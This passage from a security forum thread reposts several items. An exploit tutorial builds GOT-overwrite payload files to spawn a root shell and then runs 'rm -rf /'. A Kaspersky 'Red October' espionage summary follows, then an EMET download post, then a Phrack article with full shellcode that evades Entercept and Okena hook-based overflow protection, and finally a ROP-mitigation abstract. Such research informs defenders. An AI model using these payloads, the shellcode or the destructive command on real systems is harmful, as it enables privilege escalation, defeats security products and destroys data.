got.plt, the second call will overwrite this location with the pointer to hax(). After that, exit() is called so our pointer is used and hax() will execute, spawning a root shell. Let's go! Oh, one more thing: because the entry of execl() is located right after the entry of exit() and our memcpy call will copy 48 bytes, we need to make sure that this pointer is not wrecked by including it in our payload. ----------------------------------- (gdb) mai i sect .got.plt Exec file: `/tmp/stackvuln/stackvuln', file type elf64-x86-64. 0x00601000->0x00601050 at 0x00001000: .got.plt ALLOC LOAD DATA HAS_CONTENTS (gdb) x/10gx 0x601000 0x601000: 0x0000000000600e28 0x0000000000000000 0x601010: 0x0000000000000000 0x0000000000400526 0x601020 < fclose@got.plt>: 0x0000000000400536 0x0000000000400546 0x601030 < memcpy@got.plt>: 0x0000000000400556 0x0000000000400566 0x601040 < exit@got.plt>: 0x0000000000400576 0x0000000000400586 (gdb) p hax $1 = {< text variable, no debug info >} 0x40073b ----------------------------------- Okay, so the entry of exit is at 0x601040, and hax() is at 0x40073b. Let's construct our payloads: ----------------------------------- $ hexdump data1.dat -vC 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000030 40 10 60 00 00 00 00 00 |@.`.....| 00000038 $ hexdump data2.dat -vC 00000000 3b 07 40 00 00 00 00 00 86 05 40 00 00 00 00 00 |;.@.......@.....| 00000010 ----------------------------------- For the first call, we use 48 bytes of padding, and then overwrite the "next" pointer with a pointer to the .got.plt entry. Remember that because we are on a little-endian architecture, the order of the individual bytes of the address is reversed. The second file contains the pointer to the function of hax(), which will be written to the .got.plt in the exit() entry. The second address is the entry of execl(), and contains it's original address just to make sure it is still callable. After the two calls to memcpy, exit@plt will be called and will use our address to hax() from the .got.plt. This will mean hax() gets executed. ----------------------------------- $ ./stackvuln bash-4.2# whoami root bash-4.2# rm -rf / Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
  12. "Red October" Diplomatic Cyber Attacks Investigation Contents Executive Summary Anatomy of the attack General description Step-by-step description (1st stage) Step-by-step description (2nd stage) [*]Timeline [*]Targets KSN statistics [*]Sinkhole statistics [*]KSN + sinkhole data [*]?&C information Executive Summary In October 2012, Kaspersky Lab’s Global Research & Analysis Team initiated a new threat research after a series of attacks against computer networks of various international diplomatic service agencies. A large scale cyber-espionage network was revealed and analyzed during the investigation, which we called «Red October» (after famous novel «The Hunt For The Red October»). This report is based on detailed technical analysis of a series of targeted attacks against diplomatic, governmental and scientific research organizations in different countries, mostly related to the region of Eastern Europe, former USSR members and countries in Central Asia. The main objective of the attackers was to gather intelligence from the compromised organizations, which included computer systems, personal mobile devices and network equipment. The earliest evidence indicates that the cyber-espionage campaign was active since 2007 and is still active at the time of writing (January 2013). Besides that, registration data used for the purchase of several Command & Control (C&C) servers and unique malware filenames related to the current attackers hints at even earlier time of activity dating back to May 2007. Main Findings Advanced Cyber-espionage Network: The attackers have been active for at least several years, focusing on diplomatic and governmental agencies of various countries across the world. Information harvested from infected networks was reused in later attacks. For example, stolen credentials were compiled in a list and used when the attackers needed to guess secret phrase in other locations. To control the network of infected machines, the attackers created more than 60 domain names and several server hosting locations in different countries (mainly Germany and Russia). The C&C infrastructure is actually a chain of servers working as proxies and hiding the location of the ‘mothership’ control server. Unique architecture: The attackers created a multi-functional kit which has a capability of quick extension of the features that gather intelligence. The system is resistant to C&C server takeover and allows the attack to recover access to infected machines using alternative communication channels. Broad variety of targets: Beside traditional attack targets (workstations), the system is capable of stealing data from mobile devices, such as smartphones (iPhone, Nokia, Windows Mobile), enterprise network equipment (Cisco), removable disk drives (including already deleted files via a custom file recovery procedure). Importation of exploits: The samples we managed to find were using exploit code for vulnerabilities in Microsoft Word and Microsoft Excel that were created by other attackers and employed during different cyber attacks. The attackers left the imported exploit code untouched, perhaps to harden the identification process. Attacker identification: Basing on registration data of C&C servers and numerous artifacts left in executables of the malware, we strongly believe that the attackers have Russian-speaking origins. Current attackers and executables developed by them have been unknown until recently, they have never related to any other targeted cyberattacks. Anatomy of the attack General description These attacks comprised of the classical scenario of specific targeted attacks, consisting of two major stages: Initial infection Additional modules deployed for intelligence gathering The malicious code was delivered via e-mail as attachments (Microsoft Excel, Word and, probably PDF documents) which were rigged with exploit code for known security vulnerabilities in the mentioned applications. Right after the victim opened the malicious document on a vulnerable system, the embedded malicious code initiated the setup of the main component which in turn handled further communication with the C&C servers. Next, the system receives a number of additional spy modules from the C&C server, including modules to handle infection of smartphones. The main purpose of the spying modules is to steal information. This includes files from different cryptographic systems, such as «Acid Cryptofiler», (see https://fr.wikipedia.org/wiki/Acid_Cryptofiler) which is known to be used in organizations of European Union/European Parliament/European Commission since the summer of 2011. All gathered information is packed, encrypted and only then transferred to the C&C server. Step-by-step description (1st stage) During our investigation we couldn’t find any e-mails used in the attacks, only top level dropper documents. Nevertheless, based on indirect evidence, we know that the e-mails can be sent using one of the following methods: Using an anonymous mailbox from a free public email service provider Using mailboxes from already infected organizations E-mail subject lines as well as the text in e-mail bodies varied depending on the target (recipient). The attached file contained the exploit code which activated a Trojan dropper in the system. We have observed the use of at least three different exploits for previously known vulnerabilities: CVE-2009-3129 (MS Excel), CVE-2010-3333 (MS Word) and CVE-2012-0158 (MS Word). The first attacks that used the exploit for MS Excel started in 2010, while attacks targeting the MS Word vulnerabilities appeared in the summer of 2012. As a notable fact, the attackers used exploit code that was made public and originally came from a previously known targeted attack campaign with Chinese origins. The only thing that was changed is the executable which was embedded in the document; the attackers replaced it with their own code. Articol complet: http://www.securelist.com/en/analysis/204792262/Red_October_Diplomatic_Cyber_Attacks_Investigation Partea a II-a: http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies
  13. Enhanced Mitigation Experience Toolkit v3.5 Tech Preview A toolkit for deploying and configuring security mitigation technologies [TABLE=class: properties] [TR] [TD=class: col1]Version:[/TD] [TD=class: col2]3.5 Tech Preview[/TD] [TD=class: col3]Date published:[/TD] [TD=class: col4]7/25/2012[/TD] [/TR] [TR] [TD=class: col1]Language:[/TD] [TD=class: col234, colspan: 3] English[/TD] [/TR] [/TABLE] [TABLE=class: articles] [TR] [TD=class: col1]KB articles:[/TD] [TD=class: col234]KB2458544[/TD] [/TR] [/TABLE] [TABLE=class: files] [TR] [TH]File name[/TH] [TH]Size[/TH] [/TR] [TR] [TD=class: file-name]EMET Setup.msi[/TD] [TD=class: size]6.3 MB[/TD] [/TR] [/TABLE] Download: http://www.microsoft.com/en-us/download/details.aspx?id=30424 Info: The Enhanced Mitigation Experience Toolkit Detalii tehnice: EMET 3.5 Tech Preview leverages security mitigations from the BlueHat Prize - Security Research & Defense - Site Home - TechNet Blogs ----------------------------------------------------- Eu am in lista de aplicatii: - Flash Player (+ plugin container) - Java - Yahoo! Messenger - Firefox, Chrome, Opera, Internet Explorer - Adobe Reader - Word, Excel, PowerPoint, Outlook - VLC, Winamp + Altele Edit: Nu folositi pentru Yahoo! Messenger (cel putin nu toate optiunile), nu o sa porneasca
  14. Bypassing 3rd Party Windows Buffer Overflow Protection ==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10 |=-----------------------------------------------------------------------=| |=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=| |=-----------------------------------------------------------------------=| |=--------------=[ anonymous <p62_wbo_a@author.phrack.org ]=-------------=| |=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=| |=--------------=[ anonymous <p62_wbo_b@author.phrack.org ]=-------------=| --[ Contents 1 - Introduction 2 - Stack Backtracing 3 - Evading Kernel Hooks 3.1 - Kernel Stack Backtracing 3.2 - Faking Stack Frames 4 - Evading Userland Hooks 4.1 - Implementation Problems - Incomplete API Hooking 4.1.1 - Not Hooking all API Versions 4.1.2 - Not Hooking Deeply Enough 4.1.3 - Not Hooking Thoroughly Enough 4.2 - Fun With Trampolines 4.2.1 Patch Table Jumping 4.2.2 Hook Hopping 4.3 - Repatching Win32 APIs 4.4 - Attacking Userland Components 4.4.1 IAT Patching 4.4.2 Data Section Patching 4.5 - Calling Syscalls Directly 4.6 - Faking Stack Frames 5 - Conclusions --[ 1 - Introduction Recently, a number of commercial security systems started to offer protection against buffer overflows. This paper analyzes the protection claims and describes several techniques to bypass the buffer overflow protection. Existing commercial systems implement a number of techniques to protect against buffer overflows. Currently, stack backtracing is the most popular one. It is also the easiest to implement and the easiest to bypass. Several commercial products such as Entercept (now NAI Entercept) and Okena (now Cisco Security Agent) implement this technique. --[ 2 - Stack Backtracing Most of the existing commercial security systems do not actually prevent buffer overflows but rather try to attempt to detect the execution of shellcode. The most common technology used to detect shellcode is code page permission checking which involves checking whether code is executing on a writable page of memory. This is necessary since architectures such as x86 do not support the non-executable memory bit. Some systems also perform additional checking to see whether code's page of memory belongs to a memory mapped file section and not to an anonymous memory section. [-----------------------------------------------------------] page = get_page_from_addr( code_addr ); if (page->permissions & WRITABLE) return BUFFER_OVERFLOW; ret = page_originates_from_file( page ); if (ret != TRUE) return BUFFER_OVERFLOW; [-----------------------------------------------------------] Pseudo code for code page permission checking Buffer overflow protection technologies (BOPT) that rely on stack backtracing don't actually create non-executable heap and stack segments. Instead they hook the OS and check for shellcode execution during the hooked API calls. Most operating systems can be hooked in userland or in kernel. Next section deals with evading kernel hooks, while section 4 deals with bypassing userland hooks. --[ 3 - Evading Kernel Hooks When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must be able to detect where a userland API call originated. Due to the heavy use of kernel32.dll and ntdll.dll libraries, an API call is usually several stack frames away from the actual syscall trap call. For this reason, some intrusion preventions systems rely on using stack backtracing to locate the original caller of a system call. ----[ 3.1 - Kernel Stack Backtracing While stack backtracing can occur from either userland or kernel, it is far more important for the kernel components of a BOPT than its userland components. The existing commercial BOPT's kernel components rely entirely on stack backtracing to detect shellcode execution. Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism. Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests described above. Frequently, there is also an additional "return into libc" check, which involves checking that a return address points to an instruction immediately following a call or a jump. The basic operation of stack backtracing code, as used by a BOPT, is presented below. [-----------------------------------------------------------] while (is_valid_frame_pointer( ebp )) { ret_addr = get_ret_addr( ebp ); if (check_code_page(ret_addr) == BUFFER_OVERFLOW) return BUFFER_OVERFLOW; if (does_not_follow_call_or_jmp_opcode(ret_addr)) return BUFFER_OVERFLOW; ebp = get_next_frame( ebp ); } [-----------------------------------------------------------] Pseudo code for BOPT stack backtracing When discussing how to evade stack backtracing, it is important to understand how stack backtracing works on an x86 architecture. A typical stack frame looks as follows during a function call: : : |-------------------------| | function B parameter #2 | |-------------------------| | function B parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |=========================| | function A parameter #2 | |-------------------------| | function A parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |-------------------------| : : The EBP register points to the next stack frame. Without the EBP register it is very hard, if not impossible, to correctly identify and trace through all the stack frames. Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead. With an EBP optimization, a stack frame looks as follows during a function call: |-----------------------| | function parameter #2 | |-----------------------| | function parameter #1 | |-----------------------| | return EIP address | |-----------------------| Notice that the EBP register is not present on the stack. Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing. This makes their task incredibly hard as a simple return into libc style attack will bypass the protection. Simply originating an API call one layer higher than the BOPT hook defeats the detection technique. ----[ 3.2 - Faking Stack Frames Since the stack is under complete control of the shellcode, it is possible to completely alter its contents prior to an API call. Specially crafted stack frames can be used to bypass the buffer overflow detectors. As was explained previously, the buffer overflow detector is looking for three key indicators of legitimate code: read-only page permissions, memory mapped file section and a return address pointing to an instruction immediately following a call or jmp. Since function pointers change calling semantics, BOPT do not (and cannot) check that a call or jmp actually points to the API being called. Most importantly, the BOPT cannot check return addresses beyond the last valid EBP frame pointer (it cannot stack backtrace any further). Evading a BOPT is therefore simply a matter of creating a "final" stack frame which has a valid return address. This valid return address must point to an instruction residing in a read-only memory mapped file section and immediately following a call or jmp. Provided that the dummy return address is reasonably close to a second return address, the shellcode can easily regain control. The ideal instruction sequence to point the dummy return address to is: [-----------------------------------------------------------] jmp [eax] ; or call [eax], or another register dummy_return: ... ; some number of nops or easily ; reversed instructions, e.g. inc eax ret ; any return will do, e.g. ret 8 [-----------------------------------------------------------] Bypassing kernel BOPT components is easy because they must rely on user controlled data (the stack) to determine the validity of an API call. By correctly manipulating the stack, it is possible to prematurely terminate the stack return address analysis. This stack backtracing evasion technique is also effective against userland hooks (see section 4.6). --[ 4 - Evading Userland Hooks Given the presence of the correct instruction sequence in a valid region of memory, it is possible to trivially bypass kernel buffer overflow protection techniques. Similar techniques can be used to bypass userland BOPT components. In addition, since the shellcode executes with the same permissions as the userland hooks, a number of other techniques can be used to evade the detection. ----[ 4.1 - Implementation Problems - Incomplete API Hooking There are many problems with the userland based buffer overflow protection technologies. For example, they require the buffer overflow protection code to be in the code path of all attacker's calls or the shellcode execution will go undetected. Trying to determine what an attacker will do with his or her shellcode a priori is an extremely hard problem, if not an impossible one. Getting on the right path is not easy. Some of the obstacles in the way include: a. Not accounting for both UNICODE and ANSI versions of a Win32 API call. b. Not following the chaining nature of API calls. For example, many functions in kernel32.dll are nothing more than wrappers for other functions within kernel32.dll or ntdll.dll. c. The constantly changing nature of the Microsoft Windows API. --------[ 4.1.1 - Not Hooking All API Versions A commonly encountered mistake with userland API hooking implementations is incomplete code path coverage. In order for an API interception based products to be effective, all APIs utilized by attackers must be hooked. This requires the buffer overflow protection technology to hook somewhere along the code path an attacker _has_ to take. However, as will be shown, once an attacker has begun executing code, it becomes very difficult for third party systems to cover all code paths. Indeed, no tested commercial buffer overflow detector actually provided an effective code path coverage. Many Windows API functions have two versions: ANSI and UNICODE. The ANSI function names usually end in A, and UNICODE functions end in W because of their wide character nature. The ANSI functions are often nothing more than wrappers that call the UNICODE version of the API. For example, CreateFileA takes the ANSI file name that was passed as a parameter and turns it into an UNICODE string. It then calls CreateFileW. Unless a vendor hooks both the UNICODE and ANSI version of the API function, an attacker can bypass the protection mechanism by simply calling the other version of the function. For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt to intercept LoadLibraryW. If a protection mechanism was only going to hook one version of a function, it would make more sense to hook the UNICODE version. For this particular function, Okena/CSA does a better job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and LoadLibraryExW. Unfortunately for the third party buffer overflow detectors, simply hooking more functions in kernel32.dll is not enough. --------[ 4.1.2 - Not Hooking Deeply Enough In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many buffer overflow detection products do not hook functions within ntdll.dll. This simple error is similar to not hooking both the UNICODE and ANSI versions of a function. An attacker can simply call the ntdll.dll directly and completely bypass all the kernel32.dll "checkpoints" established by a buffer overflow detector. For example, NAI Entercept tries to detect shellcode calling GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the same goal, and at the same time never pass through the NAI Entercept hook. Similarly, shellcode can completely bypass userland hooks altogether and make system calls directly (see section 4.5). --------[ 4.1.3 - Not Hooking Thoroughly Enough The interactions between the various different Win32 API functions is byzantine, complex and difficult to understand. A vendor must make only one mistake in order to create a window of opportunity for an attacker. For example, Okena/CSA and NAI Entercept both hook WinExec trying to prevent attacker's shellcode from spawning a process. The call path for WinExec looks like this: WinExec() --> CreateProcessA() --> CreateProcessInternalA() Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() (see Appendix A and . However, neither product hooks CreateProcessInternalA() (exported by kernel32.dll). When writing a shellcode, an attacker could find the export for CreateProcessInternalA() and use it instead of calling WinExec(). CreateProcessA() pushes two NULLs onto the stack before calling CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs and then call CreateProcessInternalA() directly to evade the userland API hooks of both products. As new DLLs and APIs are released, the complexity of Win32 API internal interactions increases, making the problem worse. Third party product vendors are at a severe disadvantage when implementing their buffer overflow detection technologies and are bound to make mistakes which can be exploited by attackers. ----[ 4.2 - Fun With Trampolines Most Win32 API functions begin with a five byte preamble. First, EBP is pushed onto the stack, then ESP is moved into EBP. [-----------------------------------------------------------] Code Bytes Assembly 55 push ebp 8bec mov ebp, esp [-----------------------------------------------------------] Both Okena/CSA and Entercept use inline function hooking. They overwrite the first 5 bytes of a function with an immediate unconditional jump or call. For example, this is what the first few bytes of WinExec() look like after NAI Entercept's hooks have been installed: [-----------------------------------------------------------] Code Bytes Assembly e8 xx xx xx xx call xxxxxxxx 54 push esp 53 push ebx 56 push esi 57 push edi [-----------------------------------------------------------] Alternatively, the first few bytes could be overwritten with a jump instruction: [-----------------------------------------------------------] Code Bytes Assembly e9 xx xx xx xx jmp xxxxxxxx ... [-----------------------------------------------------------] Obviously, it is easy for shellcode to test for these and other signatures before calling a function. If a hijacking mechanism is detected, the shellcode can use several different techniques to bypass the hook. ------[ 4.2.1 - Patch Table Jumping When an API is hooked, the original preamble is saved into a table so that the buffer overflow detector can recreate the original API after performing its validation checks. The preamble is stored in a patch table, which resides somewhere in the address space of an application. When shellcode detects the presence of an API hook, it can simply search for the patch table and make its calls to patch table entries. This completely avoids the hook, preventing the userland buffer overflow detector components from ever being in the attacker's call path. ------[ 4.2.2 - Hook Hopping Alternatively, instead of locating the patch table, shellcode can include its own copy of the original pre-hook preamble. After executing its own API preamble, the shellcode can transfer execution to immediately after the API hook (function address plus five bytes). Since Intel x86 has variable length instructions, one must take this into account in order to land on an even instruction boundary: [-----------------------------------------------------------] Shellcode: call WinExecPreamble WinExecPreamble: push ebp mov ebp, esp sub esp, 54 jmp WinExec+6 [-----------------------------------------------------------] This technique will not work if another function within the call path is also hooked. In this case, Entercept also hooks CreateProcessA(), which WinExec() calls. Thus, to evade detection shellcode should call CreateProcessA() using the stored copy of CreateProcessA's preamble. ----[ 4.3 - Repatching Win32 APIs Thoroughly hooking Win32 APIs is not effective when certain fundamental errors are made in the implementation of a userland buffer overflow detection component. Certain implementations (NAI Entercept) have a serious problem with the way they perform their API hooking. In order to be able to overwrite preambles of hooked functions, the code section for a DLL has to be made writable. Entercept marks code sections of kernel32.dll and ntdll.dll as writable in order to be able to modify their contents. However, Entercept never resets the writable bit! Due to this serious security flaw, it is possible for an attacker to overwrite the API hook by re-injecting the original preamble code. For the WinExec() and CreateProcessA() examples, this would require overwriting the first 6 bytes (just to be instruction aligned) of WinExec() and CreateProcessA() with the original preamble. [-----------------------------------------------------------] WinExecOverWrite: Code Bytes Assembly 55 push ebp 8bec mov ebp, esp 83ec54 sub esp, 54 CreateProcessAOverWrite: Code Bytes Assembly 55 push ebp 8bec mov ebp, esp ff752c push DWORD PTR [ebp+2c] [-----------------------------------------------------------] This technique will not work against properly implemented buffer overflow detectors, however it is very effective against NAI Entercept. A complete shellcode example which overwrites the NAI Entercept hooks is presented below: [-----------------------------------------------------------] // This sample code overwrites the preamble of WinExec and // CreateProcessA to avoid detection. The code then // calls WinExec with a "calc.exe" parameter. // The code demonstrates that by overwriting function // preambles, it is able to evade Entercept and Okena/CSA // buffer overflow protection. _asm { pusha jmp JUMPSTART START: pop ebp xor eax, eax mov al, 0x30 mov eax, fs:[eax]; mov eax, [eax+0xc]; // We now have the module_item for ntdll.dll mov eax, [eax+0x1c] // We now have the module_item for kernel32.dll mov eax, [eax] // Image base of kernel32.dll mov eax, [eax+0x8] movzx ebx, word ptr [eax+3ch] // pe.oheader.directorydata[EXPORT=0] mov esi, [eax+ebx+78h] lea esi, [eax+esi+18h] // EBX now has the base module address mov ebx, eax lodsd // ECX now has the number of function names mov ecx, eax lodsd add eax,ebx // EDX has addresses of functions mov edx,eax lodsd // EAX has address of names add eax,ebx // Save off the number of named functions // for later push ecx // Save off the address of the functions push edx RESETEXPORTNAMETABLE: xor edx, edx INITSTRINGTABLE: mov esi, ebp // Beginning of string table inc esi MOVETHROUGHTABLE: mov edi, [eax+edx*4] add edi, ebx // EBX has the process base address xor ecx, ecx mov cl, BYTE PTR [ebp] test cl, cl jz DONESTRINGSEARCH STRINGSEARCH: // ESI points to the function string table repe cmpsb je Found // The number of named functions is on the stack cmp [esp+4], edx je NOTFOUND inc edx jmp INITSTRINGTABLE Found: pop ecx shl edx, 2 add edx, ecx mov edi, [edx] add edi, ebx push edi push ecx xor ecx, ecx mov cl, BYTE PTR [ebp] inc ecx add ebp, ecx jmp RESETEXPORTNAMETABLE DONESTRINGSEARCH: OverWriteCreateProcessA: pop edi pop edi push 0x06 pop ecx inc esi rep movsb OverWriteWinExec: pop edi push edi push 0x06 pop ecx inc esi rep movsb CallWinExec: push 0x03 push esi call [esp+8] NOTFOUND: pop edx STRINGEXIT: pop ecx popa; jmp EXIT JUMPSTART: add esp, 0x1000 call START WINEXEC: _emit 0x07 _emit 'W' _emit 'i' _emit 'n' _emit 'E' _emit 'x' _emit 'e' _emit 'c' CREATEPROCESSA: _emit 0x0e _emit 'C' _emit 'r' _emit 'e' _emit 'a' _emit 't' _emit 'e' _emit 'P' _emit 'r' _emit 'o' _emit 'c' _emit 'e' _emit 's' _emit 's' _emit 'A' ENDOFTABLE: _emit 0x00 WinExecOverWrite: _emit 0x06 _emit 0x55 _emit 0x8b _emit 0xec _emit 0x83 _emit 0xec _emit 0x54 CreateProcessAOverWrite: _emit 0x06 _emit 0x55 _emit 0x8b _emit 0xec _emit 0xff _emit 0x75 _emit 0x2c COMMAND: _emit 'c' _emit 'a' _emit 'l' _emit 'c' _emit '.' _emit 'e' _emit 'x' _emit 'e' _emit 0x00 EXIT: _emit 0x90 // Normally call ExitThread or something here _emit 0x90 } [-----------------------------------------------------------] ----[ 4.4 - Attacking Userland Components While evading the hooks and techniques used by userland buffer overflow detector components is effective, there exist other mechanisms of bypassing the detection. Because both the shellcode and the buffer overflow detector are executing with the same privileges and in the same address space, it is possible for shellcode to directly attack the buffer overflow detector userland component. Essentially, when attacking the buffer overflow detector userland component the attacker is attempting to subvert the mechanism used to perform the shellcode detection check. There are only two principle techniques for shellcode validation checking. Either the data used for the check is determined dynamically during each hooked API call, or the data is gathered at process start up and then checked during each call. In either case, it is possible for an attacker to subvert the process. ------[ 4.4.1 - IAT Patching Rather than implementing their own versions of memory page information functions, the commercial buffer overflow protection products simply use the operating system APIs. In Windows NT, these are implemented in ntdll.dll. These APIs will be imported into the userland component (itself a DLL) via its PE Import Table. An attacker can patch vectors within the import table to alter the location of an API to a function supplied by the shellcode. By supplying the function used to do the validation checking by the buffer overflow detector, it is trivial for an attacker to evade detection. ------[ 4.4.2 - Data Section Patching For various reasons, a buffer overflow detector might use a pre-built list of page permissions within the address space. When this is the case, altering the address of the VirtualQuery() API is not effective. To subvert the buffer overflow detector, the shellcode has to locate and modify the data table used by the return address validation routines. This is a fairly straightforward, although application specific, technique for subverting buffer overflow prevention technologies. ----[ 4.5 - Calling Syscalls Directly As mentioned above, rather than using ntdll.dll APIs to make system calls, it is possible for an attacker to create shellcode which makes system call directly. While this technique is very effective against userland components, it obviously cannot be used to bypass kernel based buffer overflow detectors. To take advantage of this technique you must understand what parameters a kernel function uses. These may not always be the same as the parameters required by the kernel32 or ntdll API versions. Also, you must know the system call number of the function in question. You can find this dynamically using a technique similar to the one to find function addresses. Once you have the address of the ntdll.dll version of the function you want to call, index into the function one byte and read the following DWORD. This is the system call number in the system call table for the function. This is a common trick used by rootkit developers. Here is the pseudo code for calling NtReadFile system call directly: ... xor eax, eax // Optional Key push eax // Optional pointer to large integer with the file offset push eax push Length_of_Buffer push Address_of_Buffer // Before call make room for two DWORDs called the IoStatusBlock push Address_of_IoStatusBlock // Optional ApcContext push eax // Optional ApcRoutine push eax // Optional Event push eax // Required file handle push hFile // EAX must contain the system call number mov eax, Found_Sys_Call_Num // EDX needs the address of the userland stack lea edx, [esp] // Trap into the kernel // (recent Windows NT versions use "sysenter" instead) int 2e ----[ 4.6 - Faking Stack Frames As described in section 3.2, kernel based stack backtracing can be bypassed using fake frames. Same techniques works against userland based detectors. To bypass both userland and kernel backtracing, shellcode can create a fake stack frame without the ebp register on stack. Since stack backtracing relies on the presence of the ebp register to find the next stack frame, fake frames can stop backtracing code from tracing past the fake frame. Of course, generating a fake stack frame is not going to work when the EIP register still points to shellcode which resides in a writable memory segment. To bypass the protection code, shellcode needs to use an address that lies in a non-writable memory segment. This presents a problem since shellcode needs a way to eventually regain control of the execution. The trick to regaining control is to proxy the return to shellcode through a "ret" instruction which resides in a non-writable memory segment. "ret" instruction can be found dynamically by searching memory for a 0xC3 opcode. Here is an illustration of a normal LoadLibrary("kernel32.dll") call that originates from a writable memory segment: push kernel32_string call LoadLibrary return_eip: . . . LoadLibrary: ; * see below for a stack illustration . . . ret ; return to stack-based return_eip |------------------------------| | address of "kernel32.dll" str| |------------------------------| | return address (return_eip) | |------------------------------| As explained before, the buffer overflow protection code executes before LoadLibrary gets to run. Since the return address (return_eip) is in a writable memory segment, the protection code logs the overflow and terminates the process. Next example illustrates 'proxy through a "ret" instruction' technique: push return_eip push kernel32_string ; fake "call LoadLibrary" call push address_of_ret_instruction jmp LoadLibrary return_eip: . . . LoadLibrary: ; * see below for a stack illustration . . . ret ; return to non stack-based address_of_ret_instruction address_of_ret_instruction: . . . ret ; return to stack-based return_eip Once again, the buffer overflow protection code executes before LoadLibrary gets to run. This time though, the stack is setup with a return address pointing to a non-writable memory segment. In addition, the ebp register is not present on stack thus the protection code cannot perform stack backtracing and determine that the return address in the next stack frame points to a writable segment. This allows the shellcode to call LoadLibrary which returns to the "ret" instruction. In its turn, the "ret" instruction pops the next return address off stack (return_eip) and transfers control to it. |------------------------------| | return address (return_eip) | |------------------------------| | address of "kernel32.dll" str| |------------------------------| | address of "ret" instruction | |------------------------------| In addition, any number of arbitrary complex fake stack frames can be setup to further confuse the protection code. Here is an example of a fake frame that uses a "ret 8" instruction instead of simple "ret": |--------------------------------| | return address | |--------------------------------| | address of "ret" instruction | <- fake frame 2 |--------------------------------| | any value | |--------------------------------| | address of "kernel32.dll" str | |--------------------------------| | address of "ret 8" instruction | <- fake frame 1 |--------------------------------| This causes an extra 32-bit value to be removed from stack, complicating any kind of analysis even further. --[ 5 - Conclusions The majority of commercial security systems do not actually prevent buffer overflows but rather detect the execution of shellcode. The most common technology used to detect shellcode is code page permission checking which relies on stack backtracing. Stack backtracing involves traversing stack frames and verifying that the return addresses do not originate from writable memory segments such as stack or heap areas. The paper presents a number of different ways to bypass both userland and kernel based stack backtracing. These range from tampering with function preambles to creating fake stack frames. In conclusion, the majority of current buffer overflow protection implementations are flawed, providing a false sense of security and little real protection against determined attackers. Appendix A: Entercept 4.1 Hooks Entercept hooks a number of functions in userland and in the kernel. Here is a list of the currently hooked functions as of Entercept 4.1. User Land msvcrt.dll _creat _read _write system kernel32.dll CreatePipe CreateProcessA GetProcAddress GetStartupInfoA LoadLibraryA PeekNamedPipe ReadFile VirtualProtect VirtualProtectEx WinExec WriteFile advapi32.dll RegOpenKeyA rpcrt4.dll NdrServerInitializeMarshall user32.dll ExitWindowsEx ws2_32.dll WPUCompleteOverlappedRequest WSAAddressToStringA WSACancelAsyncRequest WSACloseEvent WSAConnect WSACreateEvent WSADuplicateSocketA WSAEnumNetworkEvents WSAEventSelect WSAGetServiceClassInfoA WSCInstallNameSpace wininet.dll InternetSecurityProtocolToStringW InternetSetCookieA InternetSetOptionExA lsasrv.dll LsarLookupNames LsarLookupSids2 msv1_0.dll Msv1_0ExportSubAuthenticationRoutine Msv1_0SubAuthenticationPresent Kernel NtConnectPort NtCreateProcess NtCreateThread NtCreateToken NtCreateKey NtDeleteKey NtDeleteValueKey NtEnumerateKey NtEnumerateValueKey NtLoadKey NtLoadKey2 NtQueryKey NtQueryMultipleValueKey NtQueryValueKey NtReplaceKey NtRestoreKey NtSetValueKey NtMakeTemporaryObject NtSetContextThread NtSetInformationProcess NtSetSecurityObject NtTerminateProcess Appendix B: Okena/Cisco CSA 3.2 Hooks Okena/CSA hooks many functions in userland but many less in the kernel. A lot of the userland hooks are the same ones that Entercept hooks. However, almost all of the functions Okena/CSA hooks in the kernel are related to altering keys in the Windows registry. Okena/CSA does not seem as concerned as Entercept about backtracing calls in the kernel. This leads to an interesting vulnerability, left as an exercise to the reader. User Land kernel32.dll CreateProcessA CreateProcessW CreateRemoteThread CreateThread FreeLibrary LoadLibraryA LoadLibraryExA LoadLibraryExW LoadLibraryW LoadModule OpenProcess VirtualProtect VirtualProtectEx WinExec WriteProcessMemory ole32.dll CoFileTimeToDosDateTime CoGetMalloc CoGetStandardMarshal CoGetState CoResumeClassObjects CreateObjrefMoniker CreateStreamOnHGlobal DllGetClassObject StgSetTimes StringFromCLSID oleaut32.dll LPSAFEARRAY_UserUnmarshal urlmon.dll CoInstall Kernel NtCreateKey NtOpenKey NtDeleteKey NtDeleteValueKey NtSetValueKey NtOpenProcess NtWriteVirtualMemory |=[ EOF ]=---------------------------------------------------------------=| Sursa: .:: Phrack Magazine ::.
  15. Security Mitigations for Return-Oriented Programming Attacks Piotr Bania Kryptos Logic Research KryptosLogic 2010 Abstract With the discovery of new exploit techniques, new protection mechanisms are needed as well. Mitigations like DEP (Data Execution Prevention) or ASLR (Address Space Layout Randomization) created a significantly more difficult environment for vulnerability exploitation. Attackers, however, have recently developed new exploitation methods which are capable of bypassing the operating system’s security protection mechanisms. In this paper we present a short summary of novel and known mitigation techniques against return-oriented programming (ROP) attacks. The techniques described in this article are related mostly to x86-321 processors and Microsoft Windows operating systems. Download: kryptoslogic.com/download/ROP_Whitepaper.pdf
